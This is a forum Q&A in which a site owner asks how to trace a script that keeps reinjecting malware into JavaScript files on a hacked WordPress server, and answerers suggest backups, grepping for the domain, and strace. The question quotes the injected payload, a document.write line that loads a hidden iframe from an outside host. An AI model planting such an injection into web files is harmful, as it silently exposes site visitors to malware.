0

Possible Duplicate:
My server’s been hacked EMERGENCY

A server of mine recently suffered a malware attack. I've since cleaned the server up a bit, upgraded a variety of wordpress installs and timthumb files, and removed a lot of old and archived directories. My host (dreamhost) agrees that all the big wide open gaping vulnerabilities are closed.

Now I just need to find the source of the malware. Somewhere on my server, a script is adding an iframe injection to all my javascript files. It happens every few minutes. Here's an example of the injection, though this changes sometimes:

document.write('<iframe src="http://wbjsb.myddns.com/valcunatrop.cgi?6" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>');

If I remove this, it comes back in about 5 minutes.

Any thoughts on how to hunt down the script that is making these changes? Thanks!

PJ.
  • 203
  • 1
  • 4
  • 10
  • I watched the access logs to see if any external script was being called, but after cleaning the files, tailing the logs, and watching the files get corrupted again, nothing appeared on the access logs. – PJ. Dec 03 '12 at 17:29
  • You have backups, right? If you do, it will be much quicker and easier to do a complete re-install than to "clean" your server. – Ladadadada Dec 03 '12 at 17:48
  • @Ladadadada I do, but I'm not sure when the malware came in, so backing up might not remove the problem. I think I just figured it out, doing a tail of every log file and watching what is hit. WIP. – PJ. Dec 03 '12 at 17:53
  • Are there any files on your system with "wbjsb.myddns.com" in them? I realize sophisticated attackers obsfuscate the strings, but it's worth trying. You can also limit the files to check to those that have been accessed since the last reboot. – mpez0 Dec 03 '12 at 18:55

1 Answers1

0

If the malware is a script that is actually being executed by the web server, you could attempt to use strace to see what files are being opened and/or written to by the web server process/script interpreter based on system calls being made. It's a little low-level, but it works. (This depends on the server, scripting language, and forking model being used). You'd probably want to stick strace on the script interpreter (using php as an example, e.g. php5-fpm if it's PHP FPM, apache2 if using mod_php5) and could see what files are being opened, e.g. for apache2 with mod_php5:

sudo strace -f -e open,close,read,write apache2 -k start | tee /tmp/strace.log

or something to that effect, and examine the log. (-f forces strace to follow forks assuming your Apache is using the prefork MPM; generally the default for mod_php5 installs, -e open restricts output to only the open(2) syscall and friends). Obviously, this is going to show you every file that the server/PHP is opening, but you can do some grep magic to try and narrow it down.

You could probably narrow down based on the write(2) syscall that is occurring as well with grep (use the -v option to strace to avoid truncating the strings that are getting sent to write(2)).

blackbox222
  • 101
  • 1
  • 4